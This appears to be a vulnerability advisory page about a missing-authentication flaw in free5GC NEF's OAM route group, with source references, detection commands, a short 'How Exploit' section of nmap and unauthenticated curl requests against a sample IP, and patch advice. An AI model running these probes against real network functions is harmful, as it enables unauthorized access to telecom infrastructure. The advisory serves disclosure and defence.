Listen to this Post
free5GC’s Network Exposure Function (NEF) exposes an OAM (Operations, Administration, Maintenance) route group at /nnef-oam/v1/. This route group is mounted without any inbound OAuth2/bearer-token authorization middleware. The vulnerability exists because the NEF’s SBI (Service Based Interface) server does not enforce authentication for this specific route group, even though the NEF advertises OAuth2 setting receive from NRF: true. The code evidence shows the OAM route group is mounted without auth middleware in NFs/nef/internal/sbi/server.go:60. The OAM route is exposed at `/` in NFs/nef/internal/sbi/api_oam.go:9, and the processor returns a `200 OK` response directly in NFs/nef/internal/sbi/processor/oam.go:9. The NEF context only supports outbound token acquisition via GetTokenCtx, with no inbound authorization path. This allows any network attacker who can reach the NEF on the SBI to send a request to the OAM endpoint with no `Authorization` header at all. The handler responds with `200 OK` and returns null, confirming the lack of authentication. The structural defect is route-group-scoped, meaning any future OAM operation added to this group will inherit the missing inbound auth boundary by default. This vulnerability is tracked as upstream issue free5gc/free5gc861 and was fixed in free5gc/nef23.
DailyCVE Form:
Platform: free5GC NEF
Version: v4.2.1
Vulnerability: Missing Inbound Auth
Severity: Medium
Date: 2026-03-11
Prediction: Patch released Q2-2026
Analytics under heading What Undercode Say:
Check if NEF container is vulnerable curl -i http://10.100.200.19:8000/nnef-oam/v1/ Expected output: HTTP/1.1 200 OK Validate OAuth2 configuration docker logs nef | grep OAuth Inspect the OAM route group mounting in source code grep -n "router\.Group.oam" free5gc/nef/internal/sbi/server.go Search for missing auth middleware grep -A5 -B5 "oam" free5gc/nef/internal/sbi/server.go
How Exploit:
Step 1: Identify reachable NEF SBI endpoint nmap -p 8000 10.100.200.19 Step 2: Send unauthenticated GET request curl -k https://target:8000/nnef-oam/v1/ -H "Host: target:8000" Step 3: Observe 200 OK response without token curl -i -X GET http://10.100.200.19:8000/nnef-oam/v1/ Step 4: Enumerate other OAM endpoints curl -i http://10.100.200.19:8000/nnef-oam/v1/admin
Protection from this CVE
- Apply the security patch from free5gc/nef23 immediately.
- Manually validate that the OAM route group includes the required OAuth2 middleware.
- Monitor NEF SBI logs for unauthenticated `/nnef-oam/v1/` requests.
- Implement network-level ACLs to restrict SBI access only to trusted network functions.
- Upgrade to free5GC version 4.2.2 or higher containing the fix.
Impact
Missing authentication (CWE-306) and authorization (CWE-862) on the NEF OAM route group. Any party that can reach NEF on the SBI can probe and enumerate the OAM route surface anonymously today, and any future OAM-group endpoint (read, modify, restart-style operations) will also be accessible without authentication. Operators who assume `OAuth2 setting receive from NRF: true` enforces inbound auth on NEF are wrong for this route group.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
